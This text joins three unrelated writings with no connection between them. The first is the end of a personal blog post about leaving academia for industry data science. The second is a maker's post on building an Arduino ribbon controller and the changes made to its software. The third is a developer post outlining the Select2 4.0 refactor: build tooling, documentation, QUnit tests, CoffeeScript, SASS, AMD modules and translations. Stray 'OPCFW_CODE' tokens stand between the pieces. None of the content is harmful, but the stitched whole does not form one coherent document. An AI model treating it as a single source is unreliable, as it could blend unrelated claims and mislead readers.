rOpenSci. Actually things did not go well with that last one (it was a bitter pill to swallow, and not one I wanted to). The take home message? Some doors will stay open, others will close. Another step I took was to get an adjunct appointment at my old university (Univ. of Vermont) so I can still publish now and then, and still work on some software projects on the side. So even though I work in private industry, I still feel connected to academia.
If I were a betting man, I'd say it's only a matter of time before the typical data scientist isn't someone with a PhD in Physics (or biology), but someone who got a 1 year masters certificate. There's just too much press about data science and too much money to be made by places like Berkeley (which has an online data scientist program) minting data scientists with quick degrees for this not to happen. I figured if I was going to move to industry, the iron was hot so to speak. In three years I think the hiring landscape will be very different. But if I get in now at a good company I'll have a good chance to advance there before the glut, or be senior enough to move to a different company.
I've spoken to many people now about this transition, many people e-mailing me out of the blue for skype chats. They ask a lot about the skills they might need, where to find job postings; it's all very practical. Often missing from the conversation is that no matter what, you're walking away from a world you've likely known for 6-8 years. All that social capital you've amassed through collaboration and conferences? Gone. You are walking into a world that might not know what a post-doc even is, and certainly does not give a shit about where you publish. So what weight do you give to the personal cost of the transition? What weight do you give to the practical? In the end, even after that bottle of Knob Creek, I'm not sure I have an answer.
And that's where I'll close the book on this. If you read part 1 and part 2, you'll see they're quite personal. I had thought initially that I would write a series of posts about how the academic system is broken. Instead I found that my reasons were much more personal than structural. But I'd encourage anyone contemplating jumping off the academic ship to consider the costs and benefits beyond just the utilitarian.
|
OPCFW_CODE
|
So I now have a functioning prototype ribbon controller.
The business with the USB-to-serial converter was resolved when I realized that while the Sparkfun one I was using has a female header that the Arduino Pro Mini just plugs into, the Pololu one has male pin headers, and has to be connected to the Arduino via jumper wires, because the pin order is different. But while it runs on 3.3V, one of the pins outputs the +5V it gets from the USB. So that pin can be jumpered to the Vcc input pin on the Arduino, and with the other pins connected properly, it’ll do the serial communication while powering the Arduino with +5V. Problem solved.
I found a stick of poplar, 24″ long and nominally 1 by 2, that I bought long ago at Home Depot for some forgotten purpose. I stained it, finished it in polyurethane, and drilled out a little channel at one end. There’ll be more woodworking for the final version but that’s it for now. I stuck down the SoftPot and soldered its terminals to wires leading to an audio jack mounted on a little perfboard and secured to the stick with blue masking tape… also not the final version.
Then I connected it to the interface circuit and after some debugging of the hardware and tweaking of the software found I was getting reasonable voltages on the CV and gate output jacks. Emboldened, I plugged it into the Mother-32 for an audio demonstration. It worked!
Next steps are to solder up a permanent version of the interface circuit and install it in a box, and to do the final, prettier version of the business end of the stick.
I’ve made some changes to Audette’s software. Some of it was just removing lines of code that do not serve a purpose. Other things affect the behavior:
- Line 31 (of the original) I had to change the delimiters around Biquad.h from angle brackets to double quotes to make it work on the Arduino web IDE.
- Line 52: Changed ribbonPin from A5 to A3 because the A5 pin on the Arduino Pro Mini is hard to access.
- Line 96: Small changes to ribbon_max_val and ribbon_min_val values, reflecting what I saw in my setup.
- Line 107: Changed ribbon_span_half_steps_float from 36 to 60. This governs the range of notes spanned by the ribbon.
- Line 137: Changed CV_note_bottom from 12 to 0. This makes the pitch CV range start at 0V.
- Line 140: Small change to MAX_DAC_VOLT, reflecting my setup.
- Lines 142–143: Switched values of TRIG_NOTE_ON and TRIG_NOTE_OFF to match Mother-32 gate convention.
- Line 189: Changed argument of Serial.begin to 9600.
- Line 641: Changed KBD_track from 0.6 to 1.0. This makes the filter CV slope the same as the pitch CV slope. Between this and the change to CV_note_bottom, filter CV and pitch CV now are identical in value.
|
OPCFW_CODE
|
Simple Permutations/Combinations Question
A group of 5 men and 5 women stand in line to have their photo taken.
How many ways can they stand in line if no two men and no two women stand together?
My method: _M_M_M_M_M_
Male * Female = 5P5 * 6P5 = 86400
Correct Answer = 5! * 5! * 2 = 28800
I don't understand why I got it wrong, can anyone help please?
Why do you have 6 $_$s?
They are the spaces for the women, I used the logic of this question http://math.stackexchange.com/questions/12587/how-many-ways-are-there-for-8-men-and-5-women-to-stand-in-a-line-so-that-no-two
right, but you have 6 of them and only 5 women
Yes, so that's why I put 6P5, arranging 5 women in 6 spaces. Is that correct?
No it is not. Here neither men nor women can be neighbours. In the other question, men could be neighbours (and, given the numbers, some had to be).
Sorry I dont understand that... Isn't my method going to separate all of them so they are arranged alternately?
@André OP's reasoning makes sure both men and women are not neighbors. (It's invalid for another reason...)
Definitely not. If you assign a woman to the leftmost $3$ spaces, and to the rightmost $2$, a couple of men around the middle will be next to each other.
Oh... I see why my method is wrong now. Can you explain how the solution works?
Order the five women, order the five men, then decide whether the seats start with a man or women and interlace them. (5! x 5! x 2) @Andre Ah, duh.
Oh I didn't know that you could do that... I think I get some of it now... Is there a more 'graphical' solution? :)
@blue: Thank you for informing me of a way to solve the problem. I might have floundered helplessly otherwise. For days.
@André Sorry, I should have phrased it in the form of a hint to the OP, I know. (e.g. "Count the ways depending on whether a man or woman sits first.")
If you distinguish only by man and woman, then they can be arranged:
$$m-w-m-w-m-w-m-w-m-w$$ and $$w-m-w-m-w-m-w-m-w-m$$
If you distinguish the women, there are $5!$ possibilities. The same for the men.
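Putting it together, the factor $2$ counts the two patterns above:
$$2 \cdot 5! \cdot 5! = 2 \cdot 120 \cdot 120 = 28800.$$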
Thanks, now I get it. Maybe if the answer was (5!*5!)+(5!*5!) I could've guessed it earlier! :D
You are welcome. The main thing is, that you understand it now.
|
STACK_EXCHANGE
|
Screenshot of non active window
How to take a screen shot of non active window? If I have 2 windows, I want to capture the screenshot of the one which is running in the background.
for i in `xprop -root|grep "_NET_CLIENT_LIST_STACKING(WINDOW): window id" |tr '#' ','|tr ',' '\n'| grep 0x`;do xwininfo -id $i|grep "Window id" ;done
Using the above I was able to get the windows id. and using xwininfo able to find the label or name or title of the window.
import -window <window_ID> screenshot.png
This is the last step to automate the process. This is an interesting one for me.
This does not actually answer the question. It gets the window's ID, name and/or title, but it never takes a screenshot.
I got screenshots and it worked.
To elaborate a bit on previous answers and comments, the ability to capture a screenshot of a non active window (as in fully or partially hidden) seems to depend on the window manager.
Using the following (already given) command :
import -window <windowid> image.png
or
xwd -id <windowid> | convert xwd:- image.png
(the - of convert is for using standard input from the pipe, xwd: tells the format of the input) one seems to be able under Enlightenment (e17, tested with Fedora 19) to capture a screenshot of :
fully or partially hidden windows ;
minimized windows ;
windows on other workspaces.
I checked with Openbox (same configuration) and KDE (with an old Scientific Linux 4.8 and latest version of ImageMagick (yes, incredibly it compiled…)) and in both cases screenshots show only what is on top of the display layers — that is, only what is already visible on screen.
The point is that the import command checks for the map_state field returned by XGetWindowAttributes to be IsViewable, and if not it returns an error. One can check map_state e.g. using :
xwininfo -id <windowid> | grep 'Map State'
It seems to be always IsViewable under e17, while it's IsUnMapped under openbox and KDE as soon as the window is minimized or whatever.
Not sure though why the screenshot is always clean with e17 while it's mixed with other windows when the window is partially covered with other WMs, but obviously it also has to do with the way the WM handles the display.
Anyway, clearly it's a matter of WM. It would be nice to have a list of WMs able vs unable to do screenshots of hidden windows — I'm not doing it.
Interesting to know: You get the window id if you do xwininfo | grep -i 'window id' and click on the window in question.
does not work if the window is fully invisible (in another workspace, not the active one)
For me, both commands work fine... unless the window is minimized (I'm using Peppermint Linux).
What do you mean by "non active"? "Not having the focus" or "hidden by some other window"? In the first case, gimp will do it without any problems (File -> Create -> Screenshot). In the second case, it's more difficult (if it's possible at all).
Yes, non active means not having the focus. We can take a screenshot of the focused one. Can we make the window which does not have focus become focused using the command line? If so, how can we do that?
I want to do in commandline, to automate the process.
I just checked that import (from the ImageMagick suite) has a -window id option. If you know the window identifier that should work, even on the command line. You can get the window identifier using xwininfo, but for that you'll have to use the mouse at least once.
Can I extract a fixed height and width using import along with the window id? I am also checking that.
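For what it's worth, import also accepts ImageMagick's -crop geometry, so something like this should work (the geometry is just an example):
import -window <window_ID> -crop 640x480+0+0 screenshot.png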
While this answer may not be desirable for some situations, this script will raise every window on the current desktop one at a time so that they may be screenshotted with your screenshot tool du jour.
#!/bin/bash
# raiseAll - Mark Belanger - raise all windows
# get the ID of the current desktop
thisDT=`wmctrl -d |grep ' \* ' | awk '{print $1}'`
echo Raising windows for desktop $thisDT
for window in `wmctrl -l |grep " $thisDT " | awk '{print $1}'`
do
echo Raising $window - put your screenshot command here
wmctrl -i -a $window
sleep 1
done
Solution for kde
SystemSettings->Display And Monitors->Compositor->Keep window thumbnails set Always
Can you explain in more detail why this is a solution?
With it, kwin doesn't call "hideinternal" and the map_state flag is always IsViewable for minimized windows etc.
https://github.com/KDE/kwin/blob/d36e326d66d0d24c342b6f15cb5ef0a602cc2328/x11client.cpp#L1520
Try this! [ Ubuntu 20.04.4 ]
# Screenshot a specific window, in this case a Firefox window:
import -window "$(wmctrl -l | cut -d ' ' -f 5- | grep -i firefox)" ~/Pictures/result.jpg
# Explaining the "wmctrl -l | cut -d ' ' -f 5- | grep -i firefox", list open windows and cut out the window name part by filtering on a keyword. Install the packages if necessary!
|
STACK_EXCHANGE
|
pyramid_upwork allows your users to authorize via Upwork in your Pyramid project.
You can find it on pypi as pyramid_upwork. Also don’t forget to check the documentation.
pyramid-redis-sessions is used to store sessions in a Redis database, so you need to install Redis and configure it to listen on 127.0.0.1.
Other packages are installed automatically:
pyramid pyramid_redis_sessions python-upwork
To activate jinja2 renderer, install:
pip install pyramid_jinja2
Install with pip:
pip install pyramid_upwork
or using easy_install:
easy_install pyramid_upwork
You need to create Upwork API keys of the type Web and set appropriate permissions to the generated API key.
You can take a look at the pyramid_upwork_example application or use the instructions below.
Include following settings in your *.ini file:
[app:main]
...
# Redis session settings
redis.sessions.secret = FILL ME
# Upwork settings
upwork.api.key = FILL ME
upwork.api.secret = FILL ME
Then in your project’s __init__.py define the following function:
def get_acl_group(user_uid, request):
    """Here goes your ACL logic."""
    # All authenticated users have ``view`` permission
    return 'view'
This function should return a list of ACL group principals, or None if the user is not allowed to have any access groups. See the Pyramid documentation on security and the tutorial.
Define a RootFactory in your models.py:
class RootFactory(object):
    """This object sets the security for our application."""
    __acl__ = [
        (Allow, Authenticated, 'view'),
        (Deny, Authenticated, 'login'),
        (Allow, Everyone, 'login'),
    ]

    def __init__(self, request):
        pass
Now register the get_acl_group() function in the config registry to make authorization work. Put this in your main method:
def get_acl_group(request):
    return ('view',)

def main(global_config, **settings):
    """Main app configuration binding."""
    config = Configurator(settings=settings,
                          root_factory="myapp.models.RootFactory")
    # ACL authorization callback for pyramid-upwork
    config.registry.get_acl_group = get_acl_group
    # External includes
    config.include('pyramid_upwork')
    # Views and routing goes here
    # ...
    # config.add_view('myapp.views.MainPage',
    #                 renderer='templates/main.jinja2',
    #                 permission='view')
    return config.make_wsgi_app()
You can provide custom forbidden.jinja2 template by overriding asset in your __init__.py:
# Override forbidden template
config.override_asset(
    to_override='pyramid_upwork:templates/forbidden.jinja2',
    override_with='myapp:templates/forbidden.jinja2')
See template example in pyramid_upwork/templates/forbidden.jinja2.
The “Logout” action is also done via a POST request with CSRF protection; see the example of the “Logout” button in pyramid_upwork_example/templates/layout.jinja2.
The project is made by Cyril Panshine (@CyrilPanshine). Bug reports and pull requests are very much welcomed!
Odesk rebranded to Upwork, now using python-upwork library.
Due to oDesk Public API change we need to get user information now from client.hr.get_user_me()
Implement bugfix for case when session is broken and request token and secret are not set.
Store first and last name in the session for further usage in templates
Login and Logout actions are performed via POST and have protection against CSRF attacks
Fix BaseHandler obscuring AttributeError during dispatch
Use override_asset for overriding the forbidden.jinja2 template.
If a user is authenticated but is not authorized for some view, render the forbidden page with a Log out link instead of redirecting, to avoid a redirect loop
|
OPCFW_CODE
|
1.0 update
Is there any plan to update it for version 1.0? I'm really hoping to use this mod again, it was a total game changer for me.
Thirded. Gameplay doesn't feel right without it.
Yes, please update this
Yes another plea for an updated version :)
Waiting for an update as well. This truly is THE best mod for V Rising, a must-have!!
I agree with all above. The game just isn't as good without it.
I will be working on this, needed to wait until I got access to v1.0
Thank you so much! I really appreciate your work!
Thank you!
Absolutely amazing. Thank you so much!
Is it even possible to work on this now? When I try to launch with just BepInEx installed, it crashes.
Either way, very much look forward to the update, the game's unplayable without this as far as I'm concerned.
Would be wise for the devs to integrate this mod as a toggle camera lock option. Great work, nice QoL, and it provides great immersion.
Just checking to see how this was coming along. Very much appreciate the effort
please be patient, he is working diligently and hard on this update for all of us. if you go to the 'code' in github and see any activity on the files, that is when it will be working
the game now natively has controller support, the camera view won't affect that @IshlahulHanif
Thank you for the update
Can't wait for the update. Thank you for this mod.
I've been working on getting things updated, but there are still some issues with BepInEx that need to be resolved.
Controller support will likely NOT be included. I'm just trying to get it working again for now, then if I have time I will try to get controllers working.
We really appreciate you working on getting this updated. Thank you!
Thanks so much for keeping us in the loop. This is the only mod I use, and it completely changes the game for me. Your skill and efforts are very much appreciated
legends. all of you.
Hello, is there any progress on the update, or is a BepInEx error making you wait? Otherwise, thanks for keeping this mod updated.
I've been working on getting things updated, but there are still some issues with BepInEx that need to be resolved.
Just another THANK YOU for working on this mod again.
Does this "fix" by Odjit help with the BepInEx issue? Although I'm wondering why there is no pull request in the original repo.
https://github.com/Odjit/BepInEx/releases/tag/vrising-release
They were able to fix an issue with BepInEx crashing on startup, and hide another issue to do with logging. But it does not fix the other issues causing some features in mods not to work right now, unfortunately.
The game is unplayable without this mod.
https://github.com/decaprime/VRising-Modding/releases/tag/1.690.2 and this one for BepInEx
I know, I was involved in fixing it. Now I can update things that were not working before due to BepInEx being broken.
I wish I could help in some way but Im not skilled enough yet with coding... Still teaching myself.
Someone in one of the above comments mentioned that their friends refuse to play without that mod. I have friends with the very same sentiments.
But really thanks again and no rush, we appreciate you
When can we expect the new update?
It's impolite to ask for an ETA. It will be ready when it's ready.
Thanks for your efforts in developing the update and fix for BepInEx, @iZastic.
Thanks for your efforts xx
Well it's been a rollercoaster of a ride --- I almost couldn't bear to play V Rising because of the inability to look up and actually, I dunno, SEE the castle I spent all this time building... then I discovered your mod, and the (only slightly anemic) peasants rejoiced! ... then I saw the line of people awaiting an update. So here I am! Thank you so much for your work on what, in my opinion, is the single greatest flaw in this otherwise fantastic game!
I was seriously hoping the developer would adapt the mod to make it an in-game option...
It just baffles me how such a feature can make or break the game... well... at least in my case.
I can't wait for the mod to work again and I'm so very happy you're still working on it. Thank you very very much
Also in the waiting line. Thank you for your efforts.
bump
For those who want updates, join the v-rising modding discord (https://discord.gg/d96cWdhj) and in any chat, enter "~update". You will get the most up to date update without bothering the dev here
This is the latest post on the discord:
1.0 Update Status
Updated 4 days ago - Release Candidate #2
BepInEx and all mods needed updates after 1.0.
We have a second release candidate (RC2) for BepInEx and some mods in testing.
Mod developers: update your mods, provide feedback, and report critical issues here.
Packages for developers and testers are available on [the wiki](https://wiki.vrisingmods.com/user/game_update).
Subscribe to announcements for Thunderstore release notifications.
Thanks for your support! No ETA for ModernCamera.
Yes ill update this weekend
Mod is dead.
Is it still impolite to ask for an ETA? I just want to make sure this beautiful mod doesn't die before either a functional 1.0 version is released or everybody stops playing the game. Been waiting over 5 months to play 1.0 with this and I'm getting a bit antsy.
Try the fork at https://github.com/aequis/ModernCamera, it works for me so far, but still without config menu. Use "." to switch action mode. Beware it's work in progress, not sure if it is still being developed.
|
GITHUB_ARCHIVE
|
In Part 4, we saw how to edit and delete a customer. In this Part 5, we will just change the look and feel of our modal window.
Before CSS Applied:
We will update only the style.css file and reference it in CustomerCRUD.zul.
Here is the modified style.css file. Please note that I have also changed the look and feel of the ZK message box; to see this effect, click the delete button in the list.
Here is the modified CustomerCRUD.zul
Now you can run customerList.zul file and see the effect of CSS.
If you examine the CustomerCRUD.zul file closely, you can see that I have used sclass for all the ZK components. Using sclass, you can fine-tune a component's look and feel. For further understanding, please read here.
We can also extend a ZK component and create our own implementation of it. For example, look at the following line in the CustomerCRUD.zul file:
<button id="submit" label="Submit" mold="trendy"
sclass="mybutton orange small bigrounded" />
In order to show the button in a different style, we always have to use the two properties "mold" and "sclass". How about this:
<fbutton id="submit" label="Submit" />
Now you can see that I have removed those two properties and also changed the button to fbutton. What does this mean? Nothing yet: we will extend the default ZK button and always add these properties in that class. Let us see how we can do this. Before that, I would recommend reading this chapter in the ZK documentation.
Let us add a language definition file. You can use any name; in this example I will keep it as "myaddon.xml", and we will create this file in the WebContent folder. As a first step, we will add our CSS file to it. By doing this, we no longer need to add a reference to the CSS file in each file, i.e. it is global now.
<?xml version="1.0" encoding="UTF-8"?>
<stylesheet href="/css/style.css" type="text/css" />
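For reference, the stylesheet line lives inside a language-addon root element; a minimal sketch of the complete myaddon.xml at this stage (the addon-name and language-name values are my assumptions, not taken from the tutorial) could be:
<?xml version="1.0" encoding="UTF-8"?>
<language-addon>
    <!-- any unique name will do -->
    <addon-name>myaddon</addon-name>
    <!-- extend the standard ZUL language -->
    <language-name>xul/html</language-name>
    <stylesheet href="/css/style.css" type="text/css" />
</language-addon>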
We need to tell ZK that we have added our language definition file. This is done in the zk.xml file. Expand the WEB-INF folder and you will see the zk.xml file as shown here.
Double-click the zk.xml file and add the following line:
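The tutorial does not reproduce the line itself; based on ZK's configuration conventions, the zk.xml entry would plausibly look like this (the addon-uri path assumes myaddon.xml sits in the web root, as created above):
<language-config>
    <addon-uri>/myaddon.xml</addon-uri>
</language-config>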
Now remove the following line from the CustomerList.zul file and run it:
<style src="css/style.css" />
Now we can extend the ZK button and create our own button. Add the following lines to myaddon.xml (a sketch is shown below):
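The added lines are not shown in the text; a plausible sketch, assuming ZK's language-addon component syntax, that extends button and bakes in the mold and sclass defaults from earlier:
<component>
    <component-name>fbutton</component-name>
    <extends>button</extends>
    <property>
        <property-name>mold</property-name>
        <property-value>trendy</property-value>
    </property>
    <property>
        <property-name>sclass</property-name>
        <property-value>mybutton orange small bigrounded</property-value>
    </property>
</component>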
Now we can use our own button in all the zul files. Let me remove all sclass properties and use our component as shown here.
You can download the source code here.
|
OPCFW_CODE
|
#include "voxigen/simpleCamera.h"
#define GLM_ENABLE_EXPERIMENTAL
#include <glm/gtc/matrix_transform.hpp>
#include <glm/gtx/quaternion.hpp>
namespace voxigen
{
void Position::move(const glm::vec3 &delta)
{
m_position+=delta;
}
SimpleFpsCamera::SimpleFpsCamera(glm::vec3 position, glm::vec3 direction):
m_projectionDirty(true),
m_viewDirty(true),
m_fov(glm::radians(60.0f)),
m_near(0.1f),
m_far(10000.0f),
m_width(640),
m_height(480),
m_worldUp(0.0f, 0.0f, 1.0f)
{
//use the constructor arguments; previously they were ignored, leaving
//m_position, m_yaw, and m_pitch uninitialized
m_position=position;
setDirection(direction);
}
SimpleFpsCamera::~SimpleFpsCamera()
{}
void SimpleFpsCamera::forceUpdate()
{
m_projectionDirty=true;
m_viewDirty=true;
}
void SimpleFpsCamera::setFov(float fov)
{
m_fov=fov;
m_projectionDirty=true;
}
void SimpleFpsCamera::setClipping(float localNear, float localFar)
{
m_near=localNear;
m_far=localFar;
m_projectionDirty=true;
}
void SimpleFpsCamera::setView(size_t width, size_t height)
{
m_width=width;
m_height=height;
m_projectionDirty=true;
}
void SimpleFpsCamera::setYaw(float angle)
{
m_yaw=angle;
if(m_yaw<0.0)
m_yaw+=glm::two_pi<float>();
else if(m_yaw>glm::two_pi<float>())
m_yaw-=glm::two_pi<float>();
m_viewDirty=true;
}
void SimpleFpsCamera::setPitch(float angle)
{
m_pitch=angle;
// if(m_pitch<0.0)
// m_pitch+=glm::two_pi<float>();
// else if(m_pitch>glm::two_pi<float>())
// m_pitch-=glm::two_pi<float>();
m_viewDirty=true;
}
void SimpleFpsCamera::moveDirection(const glm::vec3 &velocity, glm::vec3 &delta)
{
glm::vec3 direction=getDirection();
glm::vec3 right=glm::normalize(glm::cross(direction, m_worldUp));
delta=(direction*velocity.x)+(right*velocity.y)+(m_worldUp*velocity.z);
m_position+=delta;
m_viewDirty=true;
}
glm::vec3 SimpleFpsCamera::getDirection()
{
//spherical-to-Cartesian conversion with Z as the world up axis
glm::vec3 direction;
float r=cos(m_pitch);
direction.x=r*cos(m_yaw);
direction.y=r*sin(m_yaw);
direction.z=sin(m_pitch);
direction=glm::normalize(direction);
return direction;
}
void SimpleFpsCamera::setDirection(const glm::vec3 &direction)
{
//atan2 picks the correct quadrant and handles direction.x==0;
//plain atan(y/x) does not
m_yaw=atan2(direction.y, direction.x);
m_pitch=asin(direction.z);
m_viewDirty=true;
}
void SimpleFpsCamera::updateMatrix()
{
bool dirty=false;
if(m_projectionDirty)
{
m_projectionDirty=false;
float ratio=(float)m_width/m_height;
m_projectionMatrix=glm::perspective(m_fov, ratio, m_near, m_far);
dirty=true;
}
if(m_viewDirty)
{
m_viewDirty=false;
glm::vec3 direction=getDirection();
m_viewMatrix=glm::lookAt(m_position, m_position+direction, m_worldUp);
dirty=true;
}
if(dirty)
m_projectionViewMatrix=m_projectionMatrix*m_viewMatrix;
}
}//namespace voxigen
|
STACK_EDU
|
I'm trying to develop a strategy and an EA based on the Dynamic Stochastic indicator. Maybe it already exists, but this is a learning experiment. I'm not interested in how profitable it is, I'm just learning MQL4. Well, while testing my EA I noticed a strange behavior that I would like to understand. Let me explain what happens.
The Dynamic Stochastic uses Bollinger Bands, calculated on the main indicator line, to get the oversold/overbought levels (instead of the usual 20/80 or 30/70 levels) and uses the median line instead of the 50 level. The external parameters are K% Period, D% Period, Smoothing, BB Period, and Deviation.
At start(), my EA uses the iCustom function to call the DS, passing all 5 parameters, in order to get the Main Stoch, Median BB, UpBB, and DnBB values.
The parameter values have been declared as extern to allow optimization and have been initialized to the default values of the Dynamic Stochastic indicator.
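For illustration, here is a hypothetical sketch of how such an EA might read the indicator buffers via iCustom; the indicator file name, parameter names, and buffer order are my assumptions, not taken from the original post:
extern int    KPeriod   = 5;
extern int    DPeriod   = 3;
extern int    Smoothing = 3;
extern int    BBPeriod  = 20;
extern double Deviation = 2.0;

// second-to-last argument = buffer index, last = shift (1 = last closed candle)
double mainStoch = iCustom(Symbol(), 0, "Dynamic Stochastic",
                           KPeriod, DPeriod, Smoothing, BBPeriod, Deviation, 0, 1);
double medianBB  = iCustom(Symbol(), 0, "Dynamic Stochastic",
                           KPeriod, DPeriod, Smoothing, BBPeriod, Deviation, 1, 1);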
The EA calculates the buy/sell signals only at candle close, so I tested my EA (without optimization, leaving the default parameter values, just to test the buy/sell signals) using the "Open price only" model on a short period (2 months) and I got, let's say, 52 trades.
At the same time I noticed that, for each single iCustom call, the Journal reported "Custom indicator Dynamic Stochastic USDCHF, H1: Loaded successfully" and immediately after "Custom indicator Dynamic Stochastic USDCHF, H1: Removed". The tester was very slooooooow.
Because some other EAs that I looked at, using the iCustom in the same way, were faster and were not showing any message, I decided to call the iCustom without the 5 parameters. This time (same Symbol, same Model, same timeframe) the Strategy tester was fast and was not showing any message in the Journal tab. Unfortunately, the number of trades was MORE THAN DOUBLE compared with the previous test.
Is this normal? How is it possible? The EA calculates the signals in the same way (at the start of a new candle), and the number of candles (same start/end testing dates, same timeframe) is exactly the same.
In theory, I should have the SAME NUMBER of trades. The first time I was PASSING the default indicator parameters, the second time I was USING the default indicator parameters. Where is the difference? I could accept that passing the parameters involves more CPU time and, for this reason, the tester is slow, but it seems that the indicator calculation produces different results and therefore a different number of trades.
Have you ever noticed such a behavior? What am I doing wrong? Any suggestion/tip is welcome.
|
OPCFW_CODE
|
Job Title: Business Intelligence Developer (Cloud Services)
Job Category: IT & Technical
Contract Type: Full-time
Deloitte is creating a new Cloud Operations Team in Cardiff to support a wide range of offerings on cloud platforms. A core function, the team will play a pivotal role in supporting the wider North West Europe cloud strategy to deliver quality cloud services across this region.
Cardiff is one of Deloitte’s hubs for supporting services so we are looking for talented individuals that seek to make an impact. In return you will be given the opportunity to showcase your talent, be fully supported in an ever changing world of technology and have the opportunity to work and travel across EMEA.
Deloitte’s Internal IT Services is looking for Business Intelligence Developers who are passionate about data and service optimization at scale in cloud platforms such as AWS. You will have a background in the design, development and optimization of a team’s operation from a BI / MI perspective.
Your role will drive our continual service improvement and operations strategy by exposing and reporting on insightful data analysis. Your BI strategy will ensure that we provide the best service to our clients.
In this role you will help make data relevant to the Cloud on current and historical performance, and visualize the key opportunities for growth and improvement. Using your technical skills, you will build tools to automate reporting and dashboard updates to drive key incentives and monitor how accurately our function is performing. You'll be involved in defining user requirements, building and maintaining the data infrastructure, designing reports and ensuring timely delivery to the end users.
Your work, your choice
How long does impact take? How long is a piece of string? How many seconds does a solution contain? How can we possibly tell? After all, impact can be huge or small. Immediate or years in the making. At Deloitte we believe the best impact is the value we add, not the hours we sit at our desk.
We, therefore, carefully consider agile ways of working, both formal and informal, that allow for the best impact for our people and our clients. If the working pattern you are looking for is not specifically indicated below, we are happy to discuss alternative arrangements.
Your professional experience
– Build reports, dashboards, models and tools to analyze, report, and present operations related data that is associated with customer pipeline, product usage, bookings forecasting and business productivity.
– Provide insights to the function through analysis of demand, activity and product data to drive greater efficiency and effectiveness of our teams.
– Develop Business Intelligence, Data Warehousing and Reporting solutions to address growing business reporting, analytics and data requirements.
– Support engagement activities to analyse business environments, gather business requirements and create data visualizations in support of work product.
Experience in the following is desirable:
– Coding experience in Java and/or Python.
– Experience with SQL and Visualization tools.
– Deep understanding of metrics and KPIs and how to use them to guide a business.
– Ability to conduct back-end and data processing work necessary to power UIs.
– Interest in user interface design and data visualization front-end architecture and implementation experience.
– Excellent analytical and problem solving skills, combined with strong business judgement and an ability to present analysis in a clear and compelling manner
|
OPCFW_CODE
|
Select2 is a jQuery plugin that can be used as a replacement for standard select boxes. It has support for remote data sets, pagination, and infinite scrolling of results. The plugin was initially released in 2012 as an alternative to Chosen that supported remote data sets and has since evolved into a flexible plugin that is configurable using a long list of options.
It has somehow managed to do this without having any clear contributing guidelines, test suite, or even additional maintainers (until I showed up, at least). A lot has changed during that time, though the core of the code base has remained relatively stable and still resembles much of what it started with, even after 240+ hands have been involved in the mix. Starting with Select2 3.0.0, the versioning has followed semver and the major version has not moved at all, even as the code has become more flexible, allowing Select2 to be used in ways that could never have been imagined. Now that nearly two years have passed since Select2 3.0.0 was released, and the code base is becoming more and more overwhelming to deal with, the opportunity has come to clean it up for a 4.0 release.
Select2 contains a lot of code that powers individual parts of the component, from the AJAX functionality to the multiple select support, most of which is typically not used in production. There has been some talk in the past about breaking Select2 up into different components, so users could only include what they needed (similar to larger frameworks such as Bootstrap), but the complexity of the code base combined with the close coupling of components has prevented this from becoming a reality. Much of what is included, such as mobile support, was added as more of an afterthought and is prone to breaking if care is not taken to constantly ensure it works.
Select2 maintains all of the documentation for a version within a single page, which has resulted in a page full of generalized examples with sparse documentation for the API and a minimal change log between versions. This has proven to be problematic, primarily because the documentation is not easy to navigate and often was not correct, containing many examples that demonstrated basic options that could be passed into Select2, but was missing some of the more complex but common examples.
There have been attempts to bring testing into the code base, but much of the issue revolved around getting a test runner set up and a few basic tests created. Because Select2 was so tightly coupled, it was difficult to isolate individual components and never became a reality.
Select2 contains all of the code base within a single directory, making it easy to find the required files, but difficult for those who use package managers such as Bower to download their files. There have been many requests to move the files into other separate directories, but this would require a breaking release, and as a result it was always pushed off to Select2 4.0.
Select2 4.0 will be a large refactoring of the current code base in an attempt to make it easier to maintain in the future, as well as opening the doors to other things such as unit testing and splitting the code into modules. It also splits up the code base to make it easier to hook into, so users will no longer have to modify the core code in order to get things to work exactly how they want.
GruntJS was chosen because of its wide popularity and the extensive plugin support added by the community. Other task runners such as GulpJS were considered, but they lacked support for plugins that were going to be used, so GruntJS was chosen in the end.
Instead of being contained on a single page, the documentation will now be organized across multiple pages. This will allow for more complex examples with more detailed explanations, as well as additional pages such as a contributing guide and more detailed change log.
The documentation will also be stored within the main repository and will be cloned to the GitHub Pages branch by a script, so it will be easier to keep the documentation more up to date. This will also allow the documentation to be versioned, so previous versions of the documentation will still be available through the documentation website.
QUnit, the unit test framework used by jQuery, was selected as the framework that will run the tests for Select2. While other test runners exist, QUnit was selected because it was easy to create tests with and could be run from within a browser, making it easy to test cross-browser compatibility within Select2. It can also be run within Grunt, allowing tests to be run by Travis CI for pull requests and other commits to the code base.
For the most part, you will not have to change your style when writing code, as the CoffeeScript compiler will work without braces. There are a few exceptions, such as the "in" operator (use "of" instead), but these are not used that often, and the compiled code will show the problem if the compiler does not point it out. Conditionals which require braces will also fail to compile, as CoffeeScript uses different levels of indentation to signal different blocks of code.
SASS is a CSS preprocessor that allows Select2 to split up the CSS files and include them within the distributed build as a single file. This also allows the CSS to be written with variables, so most options for Select2 are now configurable for those who are interested in compiling their own files. Previously, Select2 was restricted to a neutral color scheme, but this opens the door to custom color schemes that can match whatever environment Select2 is used in.
It has been requested in the past for AMD and RequireJS support to be added to Select2, and for one reason or another it never actually happened. Select2 4.0 is written entirely using AMD and includes Almond as a basic AMD loader, so users who do not already use AMD will be able to still use Select2. The distributed versions will be automatically compiled using r.js and will include all of the required modules, with optional versions that will not include the AMD loader or will include all of the possible modules.
This opens the door to custom builds in the future, for those who only need Select2 for specific cases such as only single selects or not needing support for AJAX data. A separate blog post will be created about how Select2 uses AMD and the challenges that were faced when setting it up.
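To make the pattern concrete, here is a generic AMD sketch; the module name and contents are illustrative, not Select2's actual internals:
// Each module declares exactly the dependencies it needs.
define('select2/dropdown', ['jquery'], function ($) {
  function Dropdown(options) { this.options = options; }
  return Dropdown;
});

// Consumers (or Almond, in the built file) resolve modules the same way.
require(['select2/dropdown'], function (Dropdown) {
  var dropdown = new Dropdown({ placeholder: 'Select an option' });
});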
The goal for Select2 4.0 is to maintain backwards compatibility transparently with past versions of Select2, down to Select2 3.0. With 45 individual options that can be passed to Select2 when initializing the widget, this goal may not actually be possible but we will try our best. The most commonly used options, such as the formatters and different data sources will be implemented, though they may have to be included as separate modules not included in the main build.
Translations will no longer be loaded by just including the translation file below Select2 in the page. A translations module will be included in the same form as the default options, and translations will be able to be loaded asynchronously and applied when needed. They will also no longer be done using formatters, but will instead work on basic strings (with parameters), similar to how gettext works for other languages, and those strings will be used by the default formatters.
